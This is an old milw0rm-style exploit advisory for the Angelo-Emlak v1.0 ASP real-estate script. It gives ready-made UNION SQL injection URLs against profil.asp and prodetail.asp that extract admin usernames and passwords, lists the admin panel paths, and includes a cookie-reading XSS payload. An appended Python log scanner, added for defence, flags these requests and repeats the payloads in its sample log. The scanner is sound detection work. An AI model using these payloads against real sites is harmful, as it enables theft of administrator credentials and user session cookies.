Angelo-Emlak v1.0 Multiple Remote SQL injection Vulnerable
Discovered By : U238
msn :setuid.noexec0x1[+]hotmail[-].com
webPage :http://noexec.blogspot.com
Script : http://www.aspdepo.org/tr/incele.asp?id=587&Script=angelo-emlak-v1.0-(tr)
Script2 : http://rapidshare.de/files/39240819/angelo-emlak_v1.0.zip.html
note : Siz0yyffyeniz, we are brothers, is anyone denying that :( - God damn you, $iz0. and that is the quote of the year :D
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
Exploit:
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/profil.asp?id=1+union+select+0,1,2,3,(user),(pass),1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin+where+id=1
----------
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+user,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+pass,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin
---------
Admin Panel :
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/default.asp
X13 DB Editor Admin Panel :
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/admin
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
This script is vulnerable to XSS!
Exploit :
target/angelo-emlak_v1.0/hpz/admin/Default.asp?sayfa=[XSS]
"><script>alert(document.cookie)</script>&olay=insert
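
A defender-side check for the requests shown in this advisory, added here as an example and not part of the original advisory or the Angelo-Emlak code: it scans web-server log lines for `id` and `sayfa` values that fall outside an allowlist. The log layout, the sample lines, the value `ilanlar` and the expected parameter formats are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Pages and parameters named in the advisory. The allowed formats are assumptions:
# id is a plain integer, sayfa is a short page name.
RULES = {
    "profil.asp":    ("id",    re.compile(r"\d{1,9}"),              "id-not-integer"),
    "prodetail.asp": ("id",    re.compile(r"\d{1,9}"),              "id-not-integer"),
    "default.asp":   ("sayfa", re.compile(r"[A-Za-z0-9_.-]{1,64}"), "sayfa-not-name"),
}

# Constructed sample in W3C extended style (assumed fields:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
SAMPLE_LOG = """\
2008-04-26 09:14:02 192.0.2.10 GET /hpz/profil.asp id=7 200
2008-04-26 09:14:09 198.51.100.7 GET /hpz/profil.asp id=1+union+select+0,1,2+from+admin 200
2008-04-26 09:15:31 198.51.100.7 GET /hpz/prodetail.asp ID=1%20UNION%20SELECT%20null 500
2008-04-26 09:16:44 198.51.100.7 GET /hpz/admin/Default.asp sayfa=%22%3E%3Cscript%3Ex%3C/script%3E&olay=insert 200
2008-04-26 09:17:00 192.0.2.10 GET /hpz/admin/Default.asp sayfa=ilanlar&olay=insert 200
2008-04-26 09:17:05 192.0.2.10 GET /hpz/default.asp - 200
"""

def check_line(line):
    """Return (client_ip, kind, page, decoded_value) findings for one log line."""
    fields = line.split()
    if len(fields) != 7 or line.startswith("#"):
        return []
    _, _, ip, _, stem, query, _ = fields
    page = stem.rsplit("/", 1)[-1].lower()
    rule = RULES.get(page)
    if rule is None or query == "-":
        return []
    name, allowed, kind = rule
    hits = []
    # parse_qsl decodes %xx and '+'; ASP parameter names are case-insensitive.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.lower() == name and not allowed.fullmatch(value):
            hits.append((ip, kind, page, value))
    return hits

def scan(log_text):
    """Run check_line over every line of a log and collect the findings."""
    return [hit for line in log_text.splitlines() for hit in check_line(line)]

if __name__ == "__main__":
    for ip, kind, page, value in scan(SAMPLE_LOG):
        print(f"{ip} {kind} {page} {value!r}")
```

The same allowlist (integer-only `id`, name-only `sayfa`) is what the application should enforce before the value reaches a query or the page output.
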
----------------------------------------------------
My Friends : ka0x - Marco Almeida - The_BekiR - fahn - Teyfik Cevik - Nettoxic - Caborz - Sersak - ZeberuS
U238 | Web - Designer Solutions Developer
# milw0rm.com [2008-04-26]